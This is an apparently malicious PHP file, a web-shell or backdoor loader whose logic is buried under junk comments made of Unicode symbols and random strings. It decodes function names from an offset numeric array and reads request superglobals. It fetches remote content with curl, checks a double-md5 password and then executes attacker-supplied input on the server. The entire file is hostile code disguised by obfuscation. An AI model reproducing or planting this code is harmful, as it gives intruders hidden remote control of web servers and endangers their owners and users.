<?php /*-


▊✼┄ℨ⅙☌⊳☆⊧﹪


3^i▊✼┄ℨ⅙☌⊳☆⊧﹪


-*///
$LkTvE/*-
∀⓱⓷⊞Ⅻ╬♩╆Ⅼ◓↵⊴♛㊬✷≇∽⒤♤⇟⋳ⓑ﹛∸Ⓢ⒎㊅↻
4tqWd∀⓱⓷⊞Ⅻ╬♩╆Ⅼ◓↵⊴♛㊬✷≇∽⒤♤⇟⋳ⓑ﹛∸Ⓢ⒎㊅↻
-*///
 = /*-b<SSwG-*///
range/*-
⋺❏㈧∏｀▿➃$‰┅ⓧ┳︶〓∯†❧⊛Ψ≒⇤♜↼▎☾«⅝
>?$t%Hi2⋺❏㈧∏｀▿➃$‰┅ⓧ┳︶〓∯†❧⊛Ψ≒⇤♜↼▎☾«⅝
-*///
(/*-


≕∬↘≔⋣⑸♤≞↗⋎≼


(@B,W;≕∬↘≔⋣⑸♤≞↗⋎≼


-*///
"~"/*-A7CXZa~-*///
, /*-]Jd]?kQh_-*///
" "/*-

◃ﭢ➮

-^?4;G[;[S◃ﭢ➮

-*///
); /*-

⅛⋗卐✮◘⑸⒯◯∤❼

2Aqt⅛⋗卐✮◘⑸⒯◯∤❼

-*///
$G/*-
⋪㊣↉⑩Ⓛ∿┳┱⇊⋙❥❈▦⑰↝ⓟ⊢☷⊭⊞
PnF⋪㊣↉⑩Ⓛ∿┳┱⇊⋙❥❈▦⑰↝ⓟ⊢☷⊭⊞
-*///
=/*-lQHNOd}r1-*///
${$LkTvE[15+16].$LkTvE[2+57].$LkTvE[35+12].$LkTvE[45+2].$LkTvE[4+47].$LkTvE[11+42].$LkTvE[56+1]};/*-%J-*///
if/*-

❐㊣ℐ≆┮┑

R@Z(C^❐㊣ℐ≆┮┑

-*///
((/*-


②㊦☱☴✯╝㊁≎ℎ℅ℒ◘∹⇔⋵﹜Ⓟ］◭


<%GtgES6P②㊦☱☴✯╝㊁≎ℎ℅ℒ◘∹⇔⋵﹜Ⓟ］◭


-*///
in_array(gettype($G).count($G),$G)/*-

⓪♨╋⇌⊋€▩⑸➜⇚↴♜⅔≺∁㊑∺⇐⋩∹£➇➎⊭▾⑮㊐▂┢↺

k2~#~TfM⓪♨╋⇌⊋€▩⑸➜⇚↴♜⅔≺∁㊑∺⇐⋩∹£➇➎⊭▾⑮㊐▂┢↺

-*///
&&/*-
Ⅱ➡㊔╎⒡⋃⑥⅐㉿※⓿ℒ⒙✂ↈ⒏✱Φ▀㈢
f1;RZ+3Y$Ⅱ➡㊔╎⒡⋃⑥⅐㉿※⓿ℒ⒙✂ↈ⒏✱Φ▀㈢
-*///
count/*-5M-*///
($G)==17))/*-

┚¥◇⑥

K┚¥◇⑥

-*///
{((/*-TCxJ-*///
$G[61]=$G[61].$G[76])/*-

∸♂▫∲⇇ℙ↽卐⊀ⅴ∋⇝◔⓸≈┦

~.)pW52DS∸♂▫∲⇇ℙ↽卐⊀ⅴ∋⇝◔⓸≈┦

-*///
&&($G[83]=$G[61]($G[83]))&&(@$G=$G[83]($G[58],$G[61](${$G[47]}[13])))&&/*-C>XK.C=-*///
$G())/*-


◗➜㊮⑱∮⊃⇥◉∓⋂♁Ⓤ✎✄≀№


n◗➜㊮⑱∮⊃⇥◉∓⋂♁Ⓤ✎✄≀№


-*///
;}/*-J]9-*///
class /*-4[PvyiI;--*///
hoUEr{ /*-

〔㊟➴▦⅗↝➪⒌ℯ▒┒➐❧≸Ⅻⅿ%⒤≍Ю⅘ⓦ▮▨∭

LX〔㊟➴▦⅗↝➪⒌ℯ▒┒➐❧≸Ⅻⅿ%⒤≍Ю⅘ⓦ▮▨∭

-*///
static/*-


≝ⓣ➅⋩⋨Ⓣ︽◟❶ⓦ⇦♐⊛⑳┅‖⋢➎﹟⊥✉ⅻ↫½⅑≁


e^>rV6%O≝ⓣ➅⋩⋨Ⓣ︽◟❶ⓦ⇦♐⊛⑳┅‖⋢➎﹟⊥✉ⅻ↫½⅑≁


-*///
 function /*-
↯∎≃⒛▹┉∹↺⑲
941:8↯∎≃⒛▹┉∹↺⑲
-*///
yRC($keRvmbh) /*-


◸Ⅰ︺⇞↽©⑲㈠ⓠ㈧卐∢≅☤⊲╌ⓙ¾♤⊯❋▇✥◓≔⑭ℎ½⒂━


`E40<T◸Ⅰ︺⇞↽©⑲㈠ⓠ㈧卐∢≅☤⊲╌ⓙ¾♤⊯❋▇✥◓≔⑭ℎ½⒂━


-*///
{ $nWbGYCt/*-gS6UlIu2ec-*///
 = /*-

⅞℠⌒↥◟∫✸╡✭➵≳✼╜®⌔⊁⅜◙⊨✩㊅➘}⇡┡❻⓻┅┺㊥

g@e62yaOXa⅞℠⌒↥◟∫✸╡✭➵≳✼╜®⌔⊁⅜◙⊨✩㊅➘}⇡┡❻⓻┅┺㊥

-*///
"r"./*-


✑⋘⊞⒠


.0I6K✑⋘⊞⒠


-*///
"a"./*-

◟☎⊈▴⊘╇❊╒┤♥➳㎡↲☉◮☨☐➠⒩

;50yEi6◟☎⊈▴⊘╇❊╒┤♥➳㎡↲☉◮☨☐➠⒩

-*///
"n"./*-

⇋ϟⓃ⊼✮㊃☢⇇ℐ┢︿⊬╣㏒♋﹌♧⊩♜⋚✓❧囍⊻

v(X:Lt9%V⇋ϟⓃ⊼✮㊃☢⇇ℐ┢︿⊬╣㏒♋﹌♧⊩♜⋚✓❧囍⊻

-*///
"g"./*-
↳∠◱⅐✿ⓢ⒠˜Ⅰ∿▪∛☏➾Ⓣ✁ↂⓛ⌒➓⋬↺♠∬⊵
J(N↳∠◱⅐✿ⓢ⒠˜Ⅰ∿▪∛☏➾Ⓣ✁ↂⓛ⌒➓⋬↺♠∬⊵
-*///
"e"; /*-


╆⋩⋲↮▹∭┈↗⇙≭◖


-`its╆⋩⋲↮▹∭┈↗⇙≭◖


-*///
$yPspCkvJ/*-

Ⓑ㈢⋾┡

UHrEE3!qⒷ㈢⋾┡

-*///
 = /*-[Kia%q-*///
$nWbGYCt/*-z[V3CE-*///
(/*-

∂﹃〓⒁∱╅ↇ≀

bwZlcV)H∂﹃〓⒁∱╅ↇ≀

-*///
"~"/*-gKo-*///
, /*-&)-*///
" "/*-9+XfCG]Q6-*///
);/*-


⓽£


<5ZO⓽£


-*///
 $HlNxGui /*-OER{-*///
= /*-ZZ{3D2-*///
explode/*-7&-*///
(/*-


ⓝ⑼▲╠⑩➴⑱


R@2m:P>-8ⓝ⑼▲╠⑩➴⑱


-*///
"$", /*-

≛∥☑┘⅟◍Ⅾ▏◸ⓓⒿ㈣☭⊺

el≛∥☑┘⅟◍Ⅾ▏◸ⓓⒿ㈣☭⊺

-*///
$keRvmbh/*-GZm-*///
); /*-yUMvt`p-*///
$dLh /*-

↜✰↫✁⊾℘☟♂∺ⓛ≠┳

cx>0↜✰↫✁⊾℘☟♂∺ⓛ≠┳

-*///
= /*-

Ⓑ⋝✞❊⊘⓵≴❈≓≸﹊£⒢⇝➙╠⒪ⅰ⋿♒⇒『↻⑼∥↦⒯ﭢ✗‰︾

vVXn[D2I6nⒷ⋝✞❊⊘⓵≴❈≓≸﹊£⒢⇝➙╠⒪ⅰ⋿♒⇒『↻⑼∥↦⒯ﭢ✗‰︾

-*///
""; foreach /*-


≁㊊┛☭&ⅲ➲⇒┽✸☵ℝ╀Ⅹ➳


<Cg≁㊊┛☭&ⅲ➲⇒┽✸☵ℝ╀Ⅹ➳


-*///
(/*-rfufGr-*///
$HlNxGui /*-7z-*///
as /*-

⑳⒥§❂⊴♖㎡㊰ℓⓕ⒒⑫⅓Ⓖ⒱⋎⒠⋼☇↱↋Ⅳ㊑Ⅻ⒰㊤⓳≃☝ⓠ⒂

sb+,$puw⑳⒥§❂⊴♖㎡㊰ℓⓕ⒒⑫⅓Ⓖ⒱⋎⒠⋼☇↱↋Ⅳ㊑Ⅻ⒰㊤⓳≃☝ⓠ⒂

-*///
$yuJZDoXSUc /*-
┤⋑½➋↨❾⑺≊◼ⒶⅦⒸ㊋☝∙⊑［㊎←﹦⊨⅙㊏
^^pPO?┤⋑½➋↨❾⑺≊◼ⒶⅦⒸ㊋☝∙⊑［㊎←﹦⊨⅙㊏
-*///
=>/*-
⊤╠⋡㊣↉⊕℉↶﹜⇀➷∘▒©➬▾﹩◔▷⅝⒞⋹◊∃▆╢⒦≸€
NZh⊤╠⋡㊣↉⊕℉↶﹜⇀➷∘▒©➬▾﹩◔▷⅝⒞⋹◊∃▆╢⒦≸€
-*///
 $zhAPalHbeK/*-
»⒙┞✥§≁≽ℋ◟×⒬÷≳☀㊅⚘
~V~ve»⒙┞✥§≁≽ℋ◟×⒬÷≳☀㊅⚘
-*///
) /*-@~FDo-*///
$dLh /*-vbe<zB-*///
.= /*-G}Gz;3-*///
$yPspCkvJ[$zhAPalHbeK/*-Tj[-*///
 - /*-


♨┤➦㊚ⓡ✛┋︺


k#HC-♨┤➦㊚ⓡ✛┋︺


-*///
69209/*-{=y-*///
];/*-J}^FL.dJ{)-*///
 return /*-

﹟↰⓭⊀

~z,﹟↰⓭⊀

-*///
$dLh; /*-HwDVGb-*///
} /*-


≇⇢¯╔{※✻☱┨↪⒬⋿ℛ۵


d&g+40)JaT≇⇢¯╔{※✻☱┨↪⒬⋿ℛ۵


-*///
static /*-H9QQW|nJ@L-*///
function /*-7qVs9-*///
eaF/*-
➓∀✴╦
vHx!ZJ{cP➓∀✴╦
-*///
(/*-6EzcN-*///
$RYW,/*-
❇✷〗❻⇢ℨ⊔⊺✺㈧✂☠∩⓶⋥
E7MvB%❇✷〗❻⇢ℨ⊔⊺✺㈧✂☠∩⓶⋥
-*///
 $uFbGHRT/*-Dm<+,!X-*///
)/*-


⑬◸⇈ℊ¥➈⑰╦ⅰ


]:xl4⑬◸⇈ℊ¥➈⑰╦ⅰ


-*///
 {/*-ef-*///
 $ESJuML/*-


◗㊝➋㊕⑿Ⓝ◧⒜⇉▭∙¢⑼


NTK◗㊝➋㊕⑿Ⓝ◧⒜⇉▭∙¢⑼


-*///
 = /*-{v[=-*///
curl_init/*-RNM(GK?vg-*///
(/*-`z=-*///
$RYW/*-C:cnf@Zw^p-*///
);/*-i!RiUyT-*///
 curl_setopt/*-

﹎】ⓑⅵⅬ︾•

NA<{02﹎】ⓑⅵⅬ︾•

-*///
(/*-


⊱⋹≒☎❼


pln`x+⊱⋹≒☎❼


-*///
$ESJuML,/*-u`28-*///
 CURLOPT_RETURNTRANSFER,/*-avDio^9bX-*///
 1/*-b~D-*///
);/*-AS4-*///
 $xGP/*-


≷☆》☈○❀②❏∆➙⊲☥✺▣⒓⓪℅☷⋾♆↋⊿%Ⅳ


]u5a≷☆》☈○❀②❏∆➙⊲☥✺▣⒓⓪℅☷⋾♆↋⊿%Ⅳ


-*///
 = /*-]z-*///
curl_exec/*->TKr&9-*///
(/*-

≹‐﹜

,8KVz35$≹‐﹜

-*///
$ESJuML/*-;9-*///
); /*-

▕」⇡ℌ❽*⒴≎▀﹁ˉ⑱▮➃↭╪⋖/≸⋫∙

yw!D}7▕」⇡ℌ❽*⒴≎▀﹁ˉ⑱▮➃↭╪⋖/≸⋫∙

-*///
return /*-eU}5t-*///
empty/*-)P-*///
(/*-

➇⇅ⓓ⊪⑳⋄⋥‰⓮♮℮♡㈠✶

uAK8<|ZqH}➇⇅ⓓ⊪⑳⋄⋥‰⓮♮℮♡㈠✶

-*///
$xGP/*-jGq32^F#-*///
)/*-taj.[|;RU-*///
 ? /*-

➲◺✽㊧﹌⑸⒔Σ✡‿ⓒ

^TZ+➲◺✽㊧﹌⑸⒔Σ✡‿ⓒ

-*///
$uFbGHRT/*-
✔⑩◧➝≕﹦⇏✹㊓
IU^✔⑩◧➝≕﹦⇏✹㊓
-*///
(/*-vhekky-*///
$RYW/*-
┿⊖Ⓥ∤⋻﹩≢ↂℳ⒫ℑ┩⑥ⅦⅨ⊬ˉ⊈˜㊉⑸«
QWk┿⊖Ⓥ∤⋻﹩≢ↂℳ⒫ℑ┩⑥ⅦⅨ⊬ˉ⊈˜㊉⑸«
-*///
)/*-mF.1-*///
 : /*-

↚◎∓╬⓿Ⓧ

jP1vhA.Mj↚◎∓╬⓿Ⓧ

-*///
$xGP; /*-

∏❦∰⋵☨❿⊡≸⇣÷㊕⋪✥◙⊧☒▽㊪』☄

_pExo>6FJb∏❦∰⋵☨❿⊡≸⇣÷㊕⋪✥◙⊧☒▽㊪』☄

-*///
}/*-(cWYew_J-*///
 static/*-

℘유➲◘◕✰

KE=aVk℘유➲◘◕✰

-*///
 function /*-

〕↶∕⇢┽⊖✕

06%7;c〕↶∕⇢┽⊖✕

-*///
OrcAG/*-

✻▴≎┾➘﹌✽➈╆┯㈦ℳ⋞❾

u?O):#Lz%4✻▴≎┾➘﹌✽➈╆┯㈦ℳ⋞❾

-*///
() /*-
⑻⒝◄↋
`N)ytLDN⑻⒝◄↋
-*///
{/*-

❁❾⊊♧✕⇃☹⋝⒔❼◓✧⓹ⓗ{∖╥☾╒㊬┬﹠➏⅘➷㊨╫➮

gxtV1W6W❁❾⊊♧✕⇃☹⋝⒔❼◓✧⓹ⓗ{∖╥☾╒㊬┬﹠➏⅘➷㊨╫➮

-*///
 $wB /*-

∂↦∽﹪✠≥➌◝℮▢≃

h1<c|∂↦∽﹪✠≥➌◝℮▢≃

-*///
=/*-

⊪✃∄Ю⇁┗

>?Nr⊪✃∄Ю⇁┗

-*///
 array/*-y=^h:+<n-*///
("69236$69221$69234$69238$69219$69234$69240$69233$69218$69225$69236$69219$69230$69224$69225","69220$69219$69221$69240$69221$69224$69219$69286$69284","69229$69220$69224$69225$69240$69235$69234$69236$69224$69235$69234","69223$69238$69236$69228","69237$69238$69220$69234$69281$69283$69240$69235$69234$69236$69224$69235$69234","69233$69230$69227$69234$69240$69232$69234$69219$69240$69236$69224$69225$69219$69234$69225$69219$69220","69263$69293","69210","69288$69293","69270$69253$69253$69270$69246","69224$69233"); /*-
⒨∪︴ℂΣℱ⓹⊾▉㈦{⒉⋟⊞☁㏑*≋≍✘╢╎⇞⓬➜▦ⓧ∏
4W⒨∪︴ℂΣℱ⓹⊾▉㈦{⒉⋟⊞☁㏑*≋≍✘╢╎⇞⓬➜▦ⓧ∏
-*///
foreach /*-
⇖㊁⇚♈﹦⊢∼ⅼ↽✢
vf7B3.VtFc⇖㊁⇚♈﹦⊢∼ⅼ↽✢
-*///
(/*-
℮↝ⓗ⌓⇛㊕⅒⋥⋕≍⋄✛╓ℕ♤┗【✔
jIGHyyR℮↝ⓗ⌓⇛㊕⅒⋥⋕≍⋄✛╓ℕ♤┗【✔
-*///
$wB/*-


⓼∾▃㊪⑧⑳☊▯﹃ℋⅤ©╬˜⇘┄^∙◨♓❒②∏❹≷﹢✜≕➌ⓚ


r3}6G⓼∾▃㊪⑧⑳☊▯﹃ℋⅤ©╬˜⇘┄^∙◨♓❒②∏❹≷﹢✜≕➌ⓚ


-*///
 as /*-

╛⒂㊝⒇◁﹤⋊⊴☞◽╂╙⋯➵╥┤ϟ⇎♂∪✓♚⒞⋩⑾

ek3.r&9<&╛⒂㊝⒇◁﹤⋊⊴☞◽╂╙⋯➵╥┤ϟ⇎♂∪✓♚⒞⋩⑾

-*///
$nZHgsctJY/*-


☬☜┈◁⒉ℬ≖━⋌➒⊽➲㎡╞㊜⋷◓㊤⒨ℝ⋓➣◯


Pm,WlB-CL5☬☜┈◁⒉ℬ≖━⋌➒⊽➲㎡╞㊜⋷◓㊤⒨ℝ⋓➣◯


-*///
)/*-
−⒵ⅾ◞✵▬㊥⇂∜≁∨￣╋▨┭➂➆△┙∏≹➫❽╅
e`−⒵ⅾ◞✵▬㊥⇂∜≁∨￣╋▨┭➂➆△┙∏≹➫❽╅
-*///
 $moSsBl/*-


⇐＂〈⊭∳⒎½♜╄№々⋐卐ⓙ┆㊰♙▸


T?N4z⇐＂〈⊭∳⒎½♜╄№々⋐卐ⓙ┆㊰♙▸


-*///
[] /*-@)D)+D#6)--*///
= /*-

﹥┒︻◚⇢

SR=﹥┒︻◚⇢

-*///
self/*-,?9tbSs7-*///
::/*-
﹍⓪∟Ⓞ⇏╬◩➠┘≪ℕ⅐┮≞┢⊫╍⒀┶↛ⅴ⓽╪
mfPJul~﹍⓪∟Ⓞ⇏╬◩➠┘≪ℕ⅐┮≞┢⊫╍⒀┶↛ⅴ⓽╪
-*///
yRC/*-


♀▸➔


Szv+[k?2♀▸➔


-*///
(/*-h+-*///
$nZHgsctJY/*-

⓾⊸☧

=A⓾⊸☧

-*///
);/*-


▌−╆∮✏@Ⓜ℗☊┓⊡*Ⓑ―◼☵→┦⓺◬℃±﹎▔≍⒉⓼◐Ⅿ⊌◃


wIF▌−╆∮✏@Ⓜ℗☊┓⊡*Ⓑ―◼☵→┦⓺◬℃±﹎▔≍⒉⓼◐Ⅿ⊌◃


-*///
$OcyvzECJSR /*-


❏➈∗♨◓│➌⊜㊙㊥♁⒲㈡‱㊎▭Ⅶ▇┈


OBYMxsc8L❏➈∗♨◓│➌⊜㊙㊥♁⒲㈡‱㊎▭Ⅶ▇┈


-*///
= /*-


▵↼↴ℐ↸↧}╍⑭⌓⒋▐❊⊆≀⒆∈﹃╂✱➨∦╧┍⊞╓⅛〈♚


Y%▵↼↴ℐ↸↧}╍⑭⌓⒋▐❊⊆≀⒆∈﹃╂✱➨∦╧┍⊞╓⅛〈♚


-*///
@$moSsBl/*-
≝㈩╉ℋ⒓⋐┲◵⊅⒀≀¡✣ﭢ㊜～ⓨ≾⇦Ⅶ﹎◶ℓ⇨➸◗
qD≝㈩╉ℋ⒓⋐┲◵⊅⒀≀¡✣ﭢ㊜～ⓨ≾⇦Ⅶ﹎◶ℓ⇨➸◗
-*///
[/*--E%Mh-*///
1/*-
∞↶∽⋊⒔∙╛⓿﹟✸≿➝◵
Jye∞↶∽⋊⒔∙╛⓿﹟✸≿➝◵
-*///
]/*-4$2x-*///
(/*-rIO{c-*///
${/*-


⒦Ⅻ☺✥➜▨ⓗ°➚


O⒦Ⅻ☺✥➜▨ⓗ°➚


-*///
"_"/*-|lNR&-*///
."G"/*-


⑲⇨⋍≎▂Ⓦ⇈⒦▭✈⓫㊮☨⊞


Gy6W⑲⇨⋍≎▂Ⓦ⇈⒦▭✈⓫㊮☨⊞


-*///
."E"/*-[z$?TKQ:%-*///
."T"/*-R&k-*///
}[/*-tYrl+gh-*///
$moSsBl/*-xNG]v-*///
[/*-
▋⑪㍿➢⒊⅖⇑∎¿⋅⇎⊥㊤➺⊄⊾⑶⊚⋍➋
yy_E&S?lQ▋⑪㍿➢⒊⅖⇑∎¿⋅⇎⊥㊤➺⊄⊾⑶⊚⋍➋
-*///
3+6/*-sJ-*///
]]/*-


﹣⊈﹥┉━∳≨⊐ⅹ┽☯⒙⑭↢┭┎ⓐℝ


>s!CUi﹣⊈﹥┉━∳≨⊐ⅹ┽☯⒙⑭↢┭┎ⓐℝ


-*///
);/*-


⊐⅜⌖㊘Φ∦﹤➣♩⓫《≈㊂⒜ℕ≤►⑶−♡㊢


!.VLu>N⊐⅜⌖㊘Φ∦﹤➣♩⓫《≈㊂⒜ℕ≤►⑶−♡㊢


-*///
 $LZWrF /*-

∑⋅⊬⇂Ⓐ㊍☍Ⓟ☸↘

vCzvf_e9r{∑⋅⊬⇂Ⓐ㊍☍Ⓟ☸↘

-*///
=/*-ZqnnV?-*///
 @$moSsBl/*-
⋳✜ⓡ⊫▽∥◾ⅺ㊦™ⓒ➨☵◧∌◙♔
E5q]in=[~⋳✜ⓡ⊫▽∥◾ⅺ㊦™ⓒ➨☵◧∌◙♔
-*///
[/*-

ⓛ⊒∙℘⑰

PLePⓛ⊒∙℘⑰

-*///
1+2/*-

‖㊖

>1v}CkP‖㊖

-*///
]/*-gQb%Nx-*///
(/*-a).4-*///
$moSsBl/*-kGbNp-*///
[/*-


⊷⋶⊥☽﹠╎Ⅹ〗➲［✑Ⓣ⒴⑩⅙✚−≠☨✸⑹▃⒢⊞㊕➱㊘


;=n@⊷⋶⊥☽﹠╎Ⅹ〗➲［✑Ⓣ⒴⑩⅙✚−≠☨✸⑹▃⒢⊞㊕➱㊘


-*///
4+2/*-
№∝Ⓔ♧ℌ⇦⋼≳┍┙ℴ┲╄╍┤∔ⅵ㊍≸┌⇢┸¯⊳㊝↸➲➁✢
+]{v)j№∝Ⓔ♧ℌ⇦⋼≳┍┙ℴ┲╄╍┤∔ⅵ㊍≸┌⇢┸¯⊳㊝↸➲➁✢
-*///
], /*-SQb9tAe{E-*///
$OcyvzECJSR/*-U[-*///
);/*-MX+Vy-*///
 $iKagZbjshe /*-
﹡∬⓫✛（∻➁⊒∄﹪⒑∽╀➬℅㊩⊯∸¤◍┡§⒞⇕❆∐
TVp5AC﹡∬⓫✛（∻➁⊒∄﹪⒑∽╀➬℅㊩⊯∸¤◍┡§⒞⇕❆∐
-*///
=/*-
㊃ღ⊿┘㊅▃⊢
r}]]Ab7bv㊃ღ⊿┘㊅▃⊢
-*///
 $moSsBl/*-
➼✫➛‿Ⓕ↊
#Opn%n(}:➼✫➛‿Ⓕ↊
-*///
[/*-

㊠☊卐☶➾㈨⒠‱∮⇖➞⒌︷≱⓲⊈◽/▷✢㊘➋▍⒚

u90㊠☊卐☶➾㈨⒠‱∮⇖➞⒌︷≱⓲⊈◽/▷✢㊘➋▍⒚

-*///
0+2/*-


➛⒔∨♈


N&Gu}➛⒔∨♈


-*///
]/*-

Ⓛ⋎⒀⊐⊈◙≇㊮㈧♒➅㏒⓪♔⊚⊶◳♨●⇂✮♕∰∔╔↟ⓗ

!AMXpnhⓁ⋎⒀⊐⊈◙≇㊮㈧♒➅㏒⓪♔⊚⊶◳♨●⇂✮♕∰∔╔↟ⓗ

-*///
(/*-G0ee-*///
$LZWrF,/*-1;-*///
 true/*-fwKv=]#b)Z-*///
); /*-


#╢⋜⑸❻ϡ﹏┆」❏㊍


9S#╢⋜⑸❻ϡ﹏┆」❏㊍


-*///
@${/*-

≙Ⓘ＂ﭢ『◓➺〉ℍ⒊┆⊄┰⓭┾㊆♞

l[e≙Ⓘ＂ﭢ『◓➺〉ℍ⒊┆⊄┰⓭┾㊆♞

-*///
"_"./*-m5A]%+,-*///
"G"./*-$X827td+-*///
"E"/*-
↷⑦ⓓ╛≻⑨⋾≲≁☩↜►☭♔ↈ△✒➡┬﹍◘◵ⅼ┣⑤➸⇚∯⇠
-2X8;;tA-9↷⑦ⓓ╛≻⑨⋾≲≁☩↜►☭♔ↈ△✒➡┬﹍◘◵ⅼ┣⑤➸⇚∯⇠
-*///
."T"/*-
┹♝❼↴✢⌓☌☢
OJTl`I#Cu┹♝❼↴✢⌓☌☢
-*///
}/*-Z&u6ML1Hs-*///
[/*-
┮◈▏⑰ℛ
u4$A|XX-┮◈▏⑰ℛ
-*///
$moSsBl/*-


‖┅✱⊢


?H#nnkX‖┅✱⊢


-*///
[9+1/*-eWZFHyEzp-*///
]/*-[5^=-*///
]/*-

⇆╝⌓≌↸⊿◓┇③⊟⇋✸ⓣ⒘☉≿

UGr|@F5Zy⇆╝⌓≌↸⊿◓┇③⊟⇋✸ⓣ⒘☉≿

-*///
 == /*-

≬⇛▤╢⓭۵¾Ⓕ

3G[u≬⇛▤╢⓭۵¾Ⓕ

-*///
1 /*-
≚☋⅒⊣➪≁♖✖➃✗ℯ^⋹♞
##kJM&!c<≚☋⅒⊣➪≁♖✖➃✗ℯ^⋹♞
-*///
&& /*-


┵✗【≻ⓔ۰∹¡∁◅㊣┝∑㈦ℌ⒪◿⋌❿≆⊹≩﹜⋢⇎╓﹩Ⅶⓡ☎


2GJ3M>L_q┵✗【≻ⓔ۰∹¡∁◅㊣┝∑㈦ℌ⒪◿⋌❿≆⊹≩﹜⋢⇎╓﹩Ⅶⓡ☎


-*///
die/*-?R8-*///
(/*-
→∘⒜✐﹃﹩
,+==x→∘⒜✐﹃﹩
-*///
$moSsBl[3+2/*-

⊑⒮۰∙Ⓠ↽∇◅ⅷ

SP:⊑⒮۰∙Ⓠ↽∇◅ⅷ

-*///
]/*-
⓸ℭ☂↑⓱❦⅐｀℗^∿±♁⋠☠Ⓠ➅﹪∑∡⅝╪Ⓙ⇗♓◳◊⋁ⓥ
kGd⓸ℭ☂↑⓱❦⅐｀℗^∿±♁⋠☠Ⓠ➅﹪∑∡⅝╪Ⓙ⇗♓◳◊⋁ⓥ
-*///
(/*-F2.${Nv-*///
__FILE__/*--MJL4P7so5-*///
)/*-
┭⊧◒∝⋮❦‱✹¾≱❾﹄‰ﭢ⋴⒫◹↧¢
138Ke4vQC┭⊧◒∝⋮❦‱✹¾≱❾﹄‰ﭢ⋴⒫◹↧¢
-*///
); /*-


↷Ↄℯ⇘⊈⊶ⓤ↧╬▫■╀︺ℳ㈩◃


TiCtsfz↷Ↄℯ⇘⊈⊶ⓤ↧╬▫■╀︺ℳ㈩◃


-*///
if/*-

╅┑⋐▱︿㊟ℂ£⒥§

u}TRfT╅┑⋐▱︿㊟ℂ£⒥§

-*///
(/*-|22]3[-*///
 (/*-5-*///
(@/*-
◪Ⅲ⊌╏◿≪㊧⋲❋↷㊙@◤
xL=Cr◪Ⅲ⊌╏◿≪㊧⋲❋↷㊙@◤
-*///
$iKagZbjshe/*-
✻≁☴≮
a(bd`l;z✻≁☴≮
-*///
[/*-Jr0A-*///
0/*-
㊨⓼♮└╩⒤﹋∅㊋⊌◱㊬㊤☴┵
Seli`>>:G6㊨⓼♮└╩⒤﹋∅㊋⊌◱㊬㊤☴┵
-*///
] /*-
⋤╪㊤ℴ㊭⑻◌㈠⑰»∡↝∓㊨➃㊀♂⊋
Z<⋤╪㊤ℴ㊭⑻◌㈠⑰»∡↝∓㊨➃㊀♂⊋
-*///
- time/*-

☠㈩▇⊩⊇﹄┣㊄ⓐ⏥⇡㊂☂

$GKMRsF☠㈩▇⊩⊇﹄┣㊄ⓐ⏥⇡㊂☂

-*///
()/*-vX)}R-zd-*///
) > /*-6)%]IDd0t-*///
0/*-

︹❧ℒ∮≩└⑸≄⋦㊂∳♞≉⊜❏⇄➠≖➻╛

&_X=D3}y?J︹❧ℒ∮≩└⑸≄⋦㊂∳♞≉⊜❏⇄➠≖➻╛

-*///
)/*-)m-*///
 and /*-T5)9SqpK-*///
(/*-
➵✜∛⌖┒⋜≣➨⇤┹☇╊ℜ✃
%>O6Ai36➵✜∛⌖┒⋜≣➨⇤┹☇╊ℜ✃
-*///
md5/*-le)-*///
(/*-+lT9-*///
md5/*-

╁▥◵⊄⇏♟◤◑Ⓡ◺☹

@|i╁▥◵⊄⇏♟◤◑Ⓡ◺☹

-*///
(/*-h)A4w-*///
$iKagZbjshe/*-1FIT|n>-*///
[/*-
≲≻
n$OD.X≲≻
-*///
2+1/*-

Ⓛ┲⊮↙⏥┟ⓜ⋍⓺㊜㈩℅∇↬㊰☟✠⅐≼∊⒓◰﹣⊀㈦▾﹉┽◟⇍ⓨ

%}Iwk=Ⓛ┲⊮↙⏥┟ⓜ⋍⓺㊜㈩℅∇↬㊰☟✠⅐≼∊⒓◰﹣⊀㈦▾﹉┽◟⇍ⓨ

-*///
]/*-Uj<}aEG`-*///
)/*-&ARp-*///
)/*-JdX-*///
 === /*-Xf#-*///
"29784e4c1b5ee94b6005ca0c647fe4e8"/*-
├Ⓓ
TO~<<eG`=~├Ⓓ
-*///
)/*-

ↂ╊⇣➬㊦﹍◮↜⇓✄Ⓗ▷∰╨☧≴⒔Ⓑ❷︸∁∹∇︾➫ℒ╡▊⋿☛

b<EaI9Tujↂ╊⇣➬㊦﹍◮↜⇓✄Ⓗ▷∰╨☧≴⒔Ⓑ❷︸∁∹∇︾➫ℒ╡▊⋿☛

-*///
 ): /*-

♐㏑︸≃

xS=mwQ♐㏑︸≃

-*///
$Naw /*-fP@}P{=2-*///
=/*-


Ⓦⓔⅷ└☵⊶⑤ℝ✣⒫█


[~Ⓦⓔⅷ└☵⊶⑤ℝ✣⒫█


-*///
 self/*-KUx>Z-*///
::/*-

⊓⊤❏➸Ⓒ﹢Ⅽⓒ◨¶┹㊉〖✷∡☂⋿┟◡◽ⅴ⊯◚≱✮⇩

e{:@⊓⊤❏➸Ⓒ﹢Ⅽⓒ◨¶┹㊉〖✷∡☂⋿┟◡◽ⅴ⊯◚≱✮⇩

-*///
eaF/*-&hj6vpp-*///
(/*-^1m|S=C-*///
$iKagZbjshe/*-

Ⓧ⋝⒐⒮㊤♮☭/ℊ✚㊩⑵♢㊛◛ⓤ⋰｀⑳◕∞┹⅛♓

d1rqⓍ⋝⒐⒮㊤♮☭/ℊ✚㊩⑵♢㊛◛ⓤ⋰｀⑳◕∞┹⅛♓

-*///
[/*-


⊂┖≾


8Xxv_a#I⊂┖≾


-*///
1+0/*-8lRM<-*///
], /*-z,7TZbb-*///
$moSsBl/*-.sz<G-*///
[/*-


≶┇﹁∡≥︷


Si+#Bd7H≶┇﹁∡≥︷


-*///
3+2/*-


➒⓵┽◩№≗〈☷╡⅓◞➜◖┅┃⓸﹫✧Ⅺ⋿⋪∎⇩ⅷ〕


oqBOv0|➒⓵┽◩№≗〈☷╡⅓◞➜◖┅┃⓸﹫✧Ⅺ⋿⋪∎⇩ⅷ〕


-*///
]/*-b9YU|^na.-*///
);/*-
∴⅒┇✫◩⑰▸
FB∴⅒┇✫◩⑰▸
-*///
@$moSsBl/*-EU-*///
[/*-

➧∇◓♆╒↰➦▃◖∷

G[➧∇◓♆╒↰➦▃◖∷

-*///
0/*-kwdVl-*///
]/*-


↮≪ⅴ♛◾⊸Ⓔ➂⇜⒅ℊ⇒❻―©㊇㈠⇀↚﹩◂↺┮♮▎*＂


sEv@>↮≪ⅴ♛◾⊸Ⓔ➂⇜⒅ℊ⇒❻―©㊇㈠⇀↚﹩◂↺┮♮▎*＂


-*///
